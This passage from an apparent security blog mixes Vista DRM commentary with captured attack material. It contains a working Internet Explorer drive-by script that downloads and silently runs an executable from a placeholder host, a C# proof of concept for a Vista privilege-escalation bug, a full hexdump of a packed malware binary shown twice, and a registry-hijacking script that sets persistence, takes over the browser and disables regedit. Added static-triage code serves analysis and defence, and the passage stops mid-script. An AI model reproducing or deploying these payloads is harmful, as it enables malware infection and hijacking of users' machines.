Analysis of Microsoft’s Suicide Note (part 1)

[editors note: this is becoming far too long a post for a single entry and will be serialized over the coming week]

In a controversial technical analysis Peter Gutmann goes into fantastic detail about the recently released Vista operating system and its content protection scheme. One thing became clear to me after reading this analysis: Vista is being marketed to content producers, not consumers. If Windows XP was Microsoft’s attempt to embed a browser into the operating system, then Vista is the attempt to embed DRM. Digital Rights Management technology has been applied to literally every ring of the OS architecture.

Vista’s target market is content producers, and the underlying philosophy of the user experience will be far different than what many consumers expect. Microsoft has attempted to plug the infamous “analog hole” as much as is possible by forcing all data through encryption algorithms. For those unaware, the cost of that encryption is substantial: pushing HD audio and video content through encryption/decryption routines is a tremendous strain on any system currently available and in the near future. Even with the application of Moore’s Law, a conservative estimate could place affordable and usable systems within this new content system five years away. It will be interesting to see how these restrictions will be spun by the large marketing and PR teams, since none of these innovations will benefit consumers in any way. The job that has been handed to these PR and marketing teams is to dress up a product designed with every restriction a producer has asked for and make a consumer want to buy it. One of the most quotable lines from the Gutmann analysis sums this up perfectly as, “breaking the legs of Olympic athletes and then rating them based on how fast they can hobble on crutches.”

In the past when I have delivered lectures to web application developers I would caution them to never trust user input. Perhaps developers took this philosophy a little too far. The entire operating system now seems to have turned against the user. Zero-tolerance drivers and regulation code will lock the system down if any type of deviance is detected. So-called “tilt bits” will signal an attack on the system if anything is found out of the ordinary. These changes won’t enhance user security, unfortunately, as they were designed to protect only “premium content”. Medical data, credit card numbers, and other private things that do deserve this level of protection are completely ignored. Untrusting of any environmental change, the system will shut down or degrade performance in response to a perceived attack.

This is a marked turn from the past versions of the Microsoft operating system. In the past one could take a hard drive from a Windows OS and drop it into an entirely different system. The new hardware would be detected and drivers applied on the spot. At most a single reboot would bring the user back into a usable system. This type of resilience was what impressed me during the early days of the new Windows architecture. In those days Microsoft was fairly dominant but still pursuing new customers. The new Vista scheme signals to me that they have exhausted new customer acquisition and are now focused on milking their existing market.

In the next post I will look at who benefits (Intel, Hollywood, code obfuscation providers) and who doesn’t (consumers), and some security issues (driver revocation as a DDoS vector).

Internet.HHCtrl.1 Exploit

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that serves it through iframes as a drive-by download.

another variation of drive-by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here, BD96C556-65A3-11D0-983A-00C04FC29E36, is RDS.DataSpace, the Remote Data Services control from MDAC (the flaw patched in MS06-014): its CreateObject method hands page script arbitrary COM objects without the safe-for-scripting checks the browser would normally apply, which is how the page gets XMLHTTP, ADODB.Stream and Shell.Application below.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";     // payload to fetch
path="C:\\boot.exe";                       // where it is dropped on disk
try{
// RDS.DataSpace: its CreateObject method hands script any COM object it asks for
var ado=(document.createElement("object"));
var d=1;                                   // the var x=1 lines are padding, nothing else
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";                           // "Adodb."+"Stream" is split to dodge naive string signatures
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);                     // synchronous download of the executable
xml.Send();
as.type=1;                                 // adTypeBinary
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);                     // adSaveCreateOverWrite
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);   // launch the dropped file with a hidden window
}
catch(e){}                                 // swallow any failure so the page just looks blank
;</script>
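A static triage check for the download-and-execute chain above, added here as an example; it is not code from the original post or from the site it was pulled from. It tokenises the script, folds "Adodb."+"Stream"-style concatenations through the variables that carry the pieces, and then looks for the RDS.DataSpace CLSID together with the XMLHTTP, ADODB.Stream and Shell.Application objects the chain needs. The sample script and the indicator list are constructed for the example (placeholder host, no padding lines); the check is heuristic, since comments and regex literals are not parsed and eval/unescape layers are not unwrapped.

```javascript
// Added example, not code from the original post: static triage of an IE drive-by script.
const INDICATORS = [
  { id: 'rds-dataspace',     re: /BD96C556-65A3-11D0-983A-00C04FC29E36/i, raw: true }, // raw: also catches <object classid=...>
  { id: 'xmlhttp',           re: /^(Microsoft|Msxml2)\.XMLHTTP/i },
  { id: 'adodb-stream',      re: /^ADODB\.Stream$/i },
  { id: 'shell-application', re: /^Shell\.Application$/i },
  { id: 'drop-path',         re: /^[a-z]:\\.*\.(exe|dll|scr|com|bat)$/i },
];

// Constructed sample in the style of the snippet above (placeholder host).
const SAMPLE_DRIVE_BY = String.raw`<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var ab="Adodb.", cd="Stream";
var as=ado.createobject(ab+cd,"");
xml.Open("GET",url,0); xml.Send();
as.type=1; as.open(); as.write(xml.responseBody); as.savetofile(path,2); as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}catch(e){}
</script>`;
const BENIGN_SCRIPT = 'var greet = "hello" + " world"; document.write(greet);';

const TOKEN_RE = /"(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*'|[A-Za-z_$][\w$]*|\S/g;
const ESCAPES = { n: '\n', t: '\t', r: '\r' };

function tokenize(src) {
  return Array.from(src.matchAll(TOKEN_RE), ([tok]) => {
    if (tok[0] === '"' || tok[0] === "'")
      return { type: 'str', value: tok.slice(1, -1).replace(/\\(.)/g, (_, c) => ESCAPES[c] ?? c) };
    return { type: /^[A-Za-z_$]/.test(tok) ? 'id' : 'op', value: tok };
  });
}

const isOp = (t, v) => t !== undefined && t.type === 'op' && t.value === v;

// Fold a run of  str|id (+ str|id)*  starting at index i; identifiers resolve through vars.
// Returns [folded value or null, index of the first token after the run].
function foldRun(tokens, i, vars) {
  const parts = [];
  let j = i;
  for (;;) {
    const t = tokens[j];
    if (t === undefined || (t.type !== 'str' && t.type !== 'id')) return [null, j];
    parts.push(t.type === 'str' ? t.value : vars.get(t.value));
    j += 1;
    if (!isOp(tokens[j], '+')) break;
    j += 1;
  }
  return [parts.every(p => p !== undefined) ? parts.join('') : null, j];
}

function analyse(src) {
  const tokens = tokenize(src);
  const vars = new Map();
  for (let pass = 0; pass < 2; pass++)                  // two passes so later definitions resolve too
    for (let i = 0; i + 2 < tokens.length; i++)
      if (tokens[i].type === 'id' && isOp(tokens[i + 1], '=') && !isOp(tokens[i + 2], '=')) {
        const [v] = foldRun(tokens, i + 2, vars);
        if (v !== null) vars.set(tokens[i].value, v);
      }
  const strings = [];                                   // every string the script can build statically
  for (let i = 0; i < tokens.length;) {
    const [v, j] = foldRun(tokens, i, vars);
    if (v !== null) strings.push(v);
    i = Math.max(j, i + 1);
  }
  const hits = INDICATORS
    .filter(ind => strings.some(s => ind.re.test(s)) || (ind.raw && ind.re.test(src)))
    .map(ind => ind.id).sort();
  const chain = ['rds-dataspace', 'adodb-stream', 'shell-application'].every(id => hits.includes(id));
  return { hits, folded: vars, verdict: chain ? 'download-and-execute chain' : hits.length ? 'suspicious' : 'clean' };
}

console.log(analyse(SAMPLE_DRIVE_BY).verdict, '/', analyse(BENIGN_SCRIPT).verdict);
```

The folding step is what matters: a signature on the literal string "ADODB.Stream" misses this page, while the folded value "Adodb.Stream" (and the dropped path "C:\boot.exe") is exactly what the browser will hand to COM.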

Vista exploit code

Feel free to send 50k to my paypal account :)

Russian sites are starting to post proof of concept code now. I had little idea of how trivial this exploit would be to understand, but it would seem that error message parameters are used to elevate privileges. If the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, user32 does not draw the box itself: it uses the NtRaiseHardError syscall to send a hard error message to CSRSS, which displays it on the caller’s behalf. That puts attacker-chosen text into a process that runs as SYSTEM. The byte array the code below calls helloBug is the string "\??\!!!", so the trigger is a message whose text begins with the NT object manager prefix \??\.

// C# variant
// mbox.cs
using System;
using System.Runtime.InteropServices;

class HelloWorldFromMicrosoft
{
    [DllImport("user32.dll")]
    unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

    static unsafe void Main()
    {
        // "\??\!!!" plus a terminating NUL: the message text starts with the NT object manager prefix \??\
        byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
        // With this flag user32 does not draw the box itself; it raises a hard error that CSRSS handles
        uint MB_SERVICE_NOTIFICATION = 0x00200000u;
        // The loop bound and body were eaten by the blog software (everything after the "<" of the
        // condition was lost). The call it wrapped is reconstructed here; the iteration count and the
        // use of the same buffer for text and caption are placeholders, not the original's values.
        const int Attempts = 1;
        fixed (byte* pHelloBug = &helloBug[0])
        {
            for (int i = 0; i < Attempts; i++)
            {
                MessageBoxA(0, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
            }
        }
    }
}

> csc /unsafe mbox.cs
> mbox.exe

the original exploit code found was impossible to enter into this blog so I’m uploading a picture of it.
[image: msgbox exploit PoC]

Digital Disobedience the Video

For those who were not able to attend the Digital Disobedience event on cyberactivism and culture jamming, a video has been produced and is hosted by the Berkman Center. It was a great time and I can’t thank them all enough for coming to us.

evil code part 2 (also in hex)

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000
0000010 4c01 0200 4653 4721 0000 0000 0000 0000
0000020 e000 0f01 0b01 0000 0002 0000 0016 0000
0000030 0000 0000 b351 0000 0010 0000 0c00 0000
0000040 0000 4000 0010 0000 0002 0000 0400 0000
0000050 0000 0000 0400 0000 0000 0000 0060 0000
0000060 0002 0000 0000 0000 0200 0000 0000 1000
0000070 0010 0000 0000 1000 0010 0000 0000 0000
0000080 1000 0000 0000 0000 0000 0000 7852 0000
0000090 3400 0000 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000100 0000 0000 0000 0000 7400 0000 0040 0000
0000110 0010 0000 0000 0000 0000 0000 0000 0000
0000120 0000 0000 0000 0000 e000 00c0 0000 0000
0000130 7461 0000 0010 0000 0050 0000 ac02 0000
0000140 0002 0000 0000 0000 0000 0000 0000 0000
0000150 e000 00c0 4b45 524e 454c 3332 2e64 6c6c
0000160 0000 004c 6f61 644c 6962 7261 7279 4100
0000170 0047 6574 5072 6f63 4164 6472 6573 7300
0000180 0000 0000 0000 0000 0000 0000 0000 0000
0000190 0000 0000 0000 0000 6e52 4000 6252 4000
00001a0 6452 4000 9801 4000 0010 4000 0050 4000
00001b0 0130 4000 0000 0000 d420 4000 0100 0000
00001c0 a052 4000 0000 0000 0000 0000 0000 0000
00001d0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000200 5501 8bec 81c4 f0f7 ffc4 8d45 07f8 50e8
0000210 1801 0e1e de75 4368 7930 4087 539c 3a38
0000220 0ae8 ee22 0083 c40c 8d85 60f8 4950 68d0
0000230 07cf 1ee8 7a28 121e 1916 e8d3 3423 6a04
0000240 6610 8462 0818 e8f0 9115 20ed 038c 0d01
0000250 681d 80ac 3044 9f83 f7e8 7463 34a3 84d2
0000260 5b3a 04f2 3582 0ce8 a8ac 3652 f084 c176
0000270 689e 4240 581b 878a 190b 5810 6681 3da0
0000280 1d4d 5a34 7510 be62 5a6f 25eb 29ae f93d
0000290 871d c9c2 0403 33cc 40fe 370f dc2a bd28
00002a0 280a 4205 2151 0afb fe2a 1119 3ccc 8d25
00002b0 3420 ddd9 0852 060c 1910 0c14 8643 1870
00002c0 86f7 0c24 8643 1c21 0490 2c60 0068 7174
00002d0 1c70 3a2f 4738 312e 2737 1e8c 330c 357e
00002e0 3407 7370 325f 7540 6461 7465 f66c 766f
00002f0 f02e ee78 f3c2 9528 6fb4 29ae 1e66 6f7b
0000300 3f2e be68 f03c 256c d430 5cc0 0001 1c34
0000310 2040 0075 7365 7233 321c 2e64 6c78 3d79
0000320 bd70 8369 6e74 6641 8301 8635 6f6b 32bc
0000330 d46c 1ccf 49a7 7454 d06d 7050 61ee 68c7
0000340 3e6e 73d3 7263 6114 1245 6c6f 9e7e 489b
0000350 6e44 b618 7a72 df26 4d46 6916 bb30 6f70
0000360 b50c 8747 787f 6150 726f 63fd 73c6 8646
0000370 53cc c334 6d54 699e 36f3 4421 1c0a 1859
0000380 ee45 78f6 63e1 8ac6 6164 1538 3455 5205
0000390 0850 6f50 9087 4090 2c89 75e0 6c6d 7f6f
00003a0 a68e 0f57 524c 446f 779b fc3c 5e54 5267
00003b0 3002 00be a401 4000 ad93 ad97 ad56 96b2
00003c0 80a4 b680 ff13 73f9 33c9 ff13 7316 33c0
00003d0 ff13 731f b680 41b0 10ff 1312 c073 fa75
00003e0 3caa ebe0 ff53 0802 f683 d901 750e ff53
00003f0 04eb 26ac d1e8 742f 13c9 eb1a 9148 c1e0
0000400 08ac ff53 043d 007d 0000 730a 80fc 0573
0000410 0683 f87f 7702 4141 958b c5b6 0056 8bf7
0000420 2bf0 f3a4 5eeb 9d8b d65e ad48 740a 7902
0000430 ad50 568b f297 eb87 ad93 5e46 ad97 56ff
0000440 1395 ac84 c075 fbfe 0e74 f079 0546 ad50
0000450 eb09 fe0e 0f84 8bbe ffff 5655 ff53 04ab
0000460 ebe0 33c9 41ff 1313 c9ff 1372 f8c3 02d2
0000470 7505 8a16 4612 d2c3 a052 0000 0000 0000
0000480 0000 0000 5401 0000 a052 0000 0000 0000
0000490 0000 0000 0000 0000 0000 0000 0000 0000
00004a0 6101 0000 6f01 0000 0000 0000 0000 0000
00004b0

Evil code I found today (hexdumped for your safety)

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000
0000010 4c01 0200 4653 4721 0000 0000 0000 0000
0000020 e000 0f01 0b01 0000 0002 0000 0016 0000
0000030 0000 0000 b351 0000 0010 0000 0c00 0000
0000040 0000 4000 0010 0000 0002 0000 0400 0000
0000050 0000 0000 0400 0000 0000 0000 0060 0000
0000060 0002 0000 0000 0000 0200 0000 0000 1000
0000070 0010 0000 0000 1000 0010 0000 0000 0000
0000080 1000 0000 0000 0000 0000 0000 7852 0000
0000090 3400 0000 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000100 0000 0000 0000 0000 7400 0000 0040 0000
0000110 0010 0000 0000 0000 0000 0000 0000 0000
0000120 0000 0000 0000 0000 e000 00c0 0000 0000
0000130 7461 0000 0010 0000 0050 0000 ac02 0000
0000140 0002 0000 0000 0000 0000 0000 0000 0000
0000150 e000 00c0 4b45 524e 454c 3332 2e64 6c6c
0000160 0000 004c 6f61 644c 6962 7261 7279 4100
0000170 0047 6574 5072 6f63 4164 6472 6573 7300
0000180 0000 0000 0000 0000 0000 0000 0000 0000
0000190 0000 0000 0000 0000 6e52 4000 6252 4000
00001a0 6452 4000 9801 4000 0010 4000 0050 4000
00001b0 0130 4000 0000 0000 d420 4000 0100 0000
00001c0 a052 4000 0000 0000 0000 0000 0000 0000
00001d0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000200 5501 8bec 81c4 f0f7 ffc4 8d45 07f8 50e8
0000210 1801 0e1e de75 4368 7930 4087 539c 3a38
0000220 0ae8 ee22 0083 c40c 8d85 60f8 4950 68d0
0000230 07cf 1ee8 7a28 121e 1916 e8d3 3423 6a04
0000240 6610 8462 0818 e8f0 9115 20ed 038c 0d01
0000250 681d 80ac 3044 9f83 f7e8 7463 34a3 84d2
0000260 5b3a 04f2 3582 0ce8 a8ac 3652 f084 c176
0000270 689e 4240 581b 878a 190b 5810 6681 3da0
0000280 1d4d 5a34 7510 be62 5a6f 25eb 29ae f93d
0000290 871d c9c2 0403 33cc 40fe 370f dc2a bd28
00002a0 280a 4205 2151 0afb fe2a 1119 3ccc 8d25
00002b0 3420 ddd9 0852 060c 1910 0c14 8643 1870
00002c0 86f7 0c24 8643 1c21 0490 2c60 0068 7174
00002d0 1c70 3a2f 4738 312e 2737 1e8c 330c 357e
00002e0 3407 7370 325f 7540 6461 7465 f66c 766f
00002f0 f02e ee78 f3c2 9528 6fb4 29ae 1e66 6f7b
0000300 3f2e be68 f03c 256c d430 5cc0 0001 1c34
0000310 2040 0075 7365 7233 321c 2e64 6c78 3d79
0000320 bd70 8369 6e74 6641 8301 8635 6f6b 32bc
0000330 d46c 1ccf 49a7 7454 d06d 7050 61ee 68c7
0000340 3e6e 73d3 7263 6114 1245 6c6f 9e7e 489b
0000350 6e44 b618 7a72 df26 4d46 6916 bb30 6f70
0000360 b50c 8747 787f 6150 726f 63fd 73c6 8646
0000370 53cc c334 6d54 699e 36f3 4421 1c0a 1859
0000380 ee45 78f6 63e1 8ac6 6164 1538 3455 5205
0000390 0850 6f50 9087 4090 2c89 75e0 6c6d 7f6f
00003a0 a68e 0f57 524c 446f 779b fc3c 5e54 5267
00003b0 3002 00be a401 4000 ad93 ad97 ad56 96b2
00003c0 80a4 b680 ff13 73f9 33c9 ff13 7316 33c0
00003d0 ff13 731f b680 41b0 10ff 1312 c073 fa75
00003e0 3caa ebe0 ff53 0802 f683 d901 750e ff53
00003f0 04eb 26ac d1e8 742f 13c9 eb1a 9148 c1e0
0000400 08ac ff53 043d 007d 0000 730a 80fc 0573
0000410 0683 f87f 7702 4141 958b c5b6 0056 8bf7
0000420 2bf0 f3a4 5eeb 9d8b d65e ad48 740a 7902
0000430 ad50 568b f297 eb87 ad93 5e46 ad97 56ff
0000440 1395 ac84 c075 fbfe 0e74 f079 0546 ad50
0000450 eb09 fe0e 0f84 8bbe ffff 5655 ff53 04ab
0000460 ebe0 33c9 41ff 1313 c9ff 1372 f8c3 02d2
0000470 7505 8a16 4612 d2c3 a052 0000 0000 0000
0000480 0000 0000 5401 0000 a052 0000 0000 0000
0000490 0000 0000 0000 0000 0000 0000 0000 0000
00004a0 6101 0000 6f01 0000 0000 0000 0000 0000
00004b0
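Both posts above carry the same bytes, so one worked example serves both. It is added here and is not code from the original posts: it rebuilds the bytes from an `od`-style dump and walks the PE header statically, which is the safe first step before anything about the file is trusted. It assumes the dump layout used on the page (a 7-digit hex offset, then 16-bit groups printed in byte order, so "4d5a" really is "MZ", and a lone "*" meaning "the previous line repeats up to the next offset"). The excerpt embedded below is constructed from the dump: only the lines the header walk touches are kept, and every offset left out is zero in the original (padding or inside a "*" run).

```javascript
// Added example, not code from the original post: static triage of the dumped PE.
// Constructed excerpt of the dump above; offsets not listed are zero in the original.
const DUMP_EXCERPT = `
0000000 4d5a 9000 0300 0000 0400 0000 5045 0000
0000010 4c01 0200 4653 4721 0000 0000 0000 0000
0000020 e000 0f01 0b01 0000 0002 0000 0016 0000
0000030 0000 0000 b351 0000 0010 0000 0c00 0000
0000040 0000 4000 0010 0000 0002 0000 0400 0000
0000050 0000 0000 0400 0000 0000 0000 0060 0000
0000060 0002 0000 0000 0000 0200 0000 0000 1000
0000070 0010 0000 0000 1000 0010 0000 0000 0000
0000080 1000 0000 0000 0000 0000 0000 7852 0000
0000090 3400 0000 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000100 0000 0000 0000 0000 7400 0000 0040 0000
0000110 0010 0000 0000 0000 0000 0000 0000 0000
0000120 0000 0000 0000 0000 e000 00c0 0000 0000
0000130 7461 0000 0010 0000 0050 0000 ac02 0000
0000140 0002 0000 0000 0000 0000 0000 0000 0000
0000150 e000 00c0 4b45 524e 454c 3332 2e64 6c6c
0000160 0000 004c 6f61 644c 6962 7261 7279 4100
0000170 0047 6574 5072 6f63 4164 6472 6573 7300
00003b0 3002 00be a401 4000 ad93 ad97 ad56 96b2
0000470 7505 8a16 4612 d2c3 a052 0000 0000 0000
0000480 0000 0000 5401 0000 a052 0000 0000 0000
00004a0 6101 0000 6f01 0000 0000 0000 0000 0000
00004b0
`;

function bytesFromDump(text) {
  const rows = [];
  let prev = null, repeat = false, size = 0;
  for (const line of text.split('\n').map(l => l.trim()).filter(Boolean)) {
    if (line === '*') { repeat = true; continue; }
    const [off, ...groups] = line.split(/\s+/);
    const offset = parseInt(off, 16);
    if (repeat && prev)                                   // replay the previous row up to this offset
      for (let o = prev.offset + 16; o < offset; o += 16) rows.push({ offset: o, bytes: prev.bytes });
    repeat = false;
    const bytes = groups.flatMap(g => [parseInt(g.slice(0, 2), 16), parseInt(g.slice(2, 4), 16)]);
    if (bytes.length) rows.push(prev = { offset, bytes });
    size = Math.max(size, offset + bytes.length);          // the trailing bare offset gives the file size
  }
  const buf = new Uint8Array(size);
  for (const r of rows) buf.set(r.bytes, r.offset);
  return buf;
}

const u16 = (b, o) => b[o] | (b[o + 1] << 8);
const u32 = (b, o) => (b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24)) >>> 0;
const cstr = (b, o) => { let s = ''; while (o < b.length && b[o]) s += String.fromCharCode(b[o++]); return s; };
const hex = (b, o, n) => Array.from(b.subarray(o, o + n), x => x.toString(16).padStart(2, '0')).join('');

function triagePe(b) {
  if (u16(b, 0) !== 0x5a4d) throw new Error('no MZ header');
  const pe = u32(b, 0x3c);                      // e_lfanew is 0x0c here: the PE header sits inside the DOS header
  if (u32(b, pe) !== 0x4550) throw new Error('no PE signature at e_lfanew');
  const coff = pe + 4, opt = coff + 20, optSize = u16(b, coff + 16);
  const sections = Array.from({ length: u16(b, coff + 2) }, (_, i) => {
    const s = opt + optSize + i * 40;
    return { name: String.fromCharCode(...b.subarray(s, s + 8)).replace(/\0/g, ''), vsize: u32(b, s + 8),
             va: u32(b, s + 12), rawSize: u32(b, s + 16), raw: u32(b, s + 20), flags: u32(b, s + 36) };
  });
  const inSection = (x, rva) => rva >= x.va && rva < x.va + Math.max(x.vsize, x.rawSize);
  const rva2off = rva => {
    const s = sections.find(x => inSection(x, rva));
    if (!s && rva < sections[0].va) return rva;   // header RVAs map 1:1 onto the file
    if (!s || rva - s.va >= s.rawSize) throw new Error(`rva 0x${rva.toString(16)} has no file backing`);
    return rva - s.va + s.raw;
  };
  const imports = [];                           // data directory[1] = import table; descriptors are 20 bytes
  for (let d = rva2off(u32(b, opt + 104)); u32(b, d + 12) !== 0; d += 20) {
    const names = [];
    for (let t = rva2off(u32(b, d) || u32(b, d + 16)); u32(b, t) !== 0; t += 4) {
      const e = u32(b, t);
      names.push(e & 0x80000000 ? `#${e & 0xffff}` : cstr(b, rva2off(e) + 2));   // +2 skips the hint word
    }
    imports.push({ dll: cstr(b, rva2off(u32(b, d + 12))), names });
  }
  const entryRva = u32(b, opt + 16);
  return { machine: u16(b, coff), stampTag: String.fromCharCode(...b.subarray(coff + 4, coff + 8)),
           imageBase: u32(b, opt + 28), entryRva, entrySection: sections.findIndex(x => inSection(x, entryRva)),
           entryBytes: hex(b, rva2off(entryRva), 6), sections, imports };
}

function describe(r) {
  const hollow = r.sections.some(s => s.rawSize === 0 && s.vsize > 0);   // room reserved for unpacked code
  const loaderOnly = r.imports.length === 1 && r.imports[0].names.every(n => n === 'LoadLibraryA' || n === 'GetProcAddress');
  return r.stampTag === 'FSG!' && hollow && loaderOnly
    ? `FSG-packed PE32: stub at RVA 0x${r.entryRva.toString(16)} unpacks into the section with no raw data and resolves the real imports through ${r.imports[0].names.join('/')}`
    : 'no packer hint';
}

console.log(describe(triagePe(bytesFromDump(DUMP_EXCERPT))));
```

What the walk turns up: the timestamp field holds the ASCII tag "FSG!", the first section has a 0x4000-byte virtual size but no raw data, the whole import table is KERNEL32.dll!LoadLibraryA and GetProcAddress, and the entry point (RVA 0x51b3, file offset 0x3b3) lands on a `mov esi, 0x4001a4` followed by the lodsd/xchg sequence of an FSG decompression stub. None of that says what the payload does; it says the real imports and code only exist after the stub runs, so the next step is unpacking in an isolated environment, not signature matching on these bytes.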

Registry altering web page

I found this amusing today. It is a javascript that was linked to a lotto information page. It changed some rather important registry keys.

var url = "http://EVIL_SITE";
var burl = "http://EVIL_SITE";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);                 // 0 = the Windows folder
var filepath = tfolder + "\\system32\\EVIL.js";        // a copy of the script, dropped next to the system binaries
var Shell = new ActiveXObject("WScript.Shell");
// persistence: run the dropped script at the next logon (RunOnce) and at every logon (Run)
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\System32",filepath);
// browser hijack: the home page, plus the address-bar history so autocomplete keeps offering the site
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://EVIL_SITE");
// Yahoo Messenger content panes pointed at the site
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Calendar\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Games\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Launchcast\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Weather\\content url","http://EVIL_SITE");
// Internet Explorer zone map: zone 4 is Restricted Sites (the six domains are redacted here)
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
// lock the victim out of undoing it: regedit disabled, home page setting locked by policy
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",1,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Homepage",1,"REG_DWORD");
// cosmetics and more hijacking: window title, search page, default page, session history, Links folder name
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\window title","-� EVIL_SITE �-");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\default_page_url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Save_Session_History_On_Exit","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\LinksFolderName",".::EVIL_SITE::. ");
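An added example, not code from the original post: given a script like the one above, pull out every RegWrite call, classify what each key is used for (persistence, browser hijack, zone tampering, lockdown), and emit the matching `reg delete` lines for cleanup. It assumes the keys are plain string literals, as they are above; a value passed through a variable is resolved from a simple `name = "literal"` assignment. The sample script is a constructed subset with a hard-coded drop path instead of the GetSpecialFolder lookup.

```javascript
// Added example, not code from the original post: classify RegWrite calls and build a cleanup plan.
// Constructed subset of the script above (placeholder host, hard-coded drop path).
const SAMPLE_SCRIPT = String.raw`
var url = "http://EVIL_SITE";
var filepath = "C:\\WINDOWS\\system32\\EVIL.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
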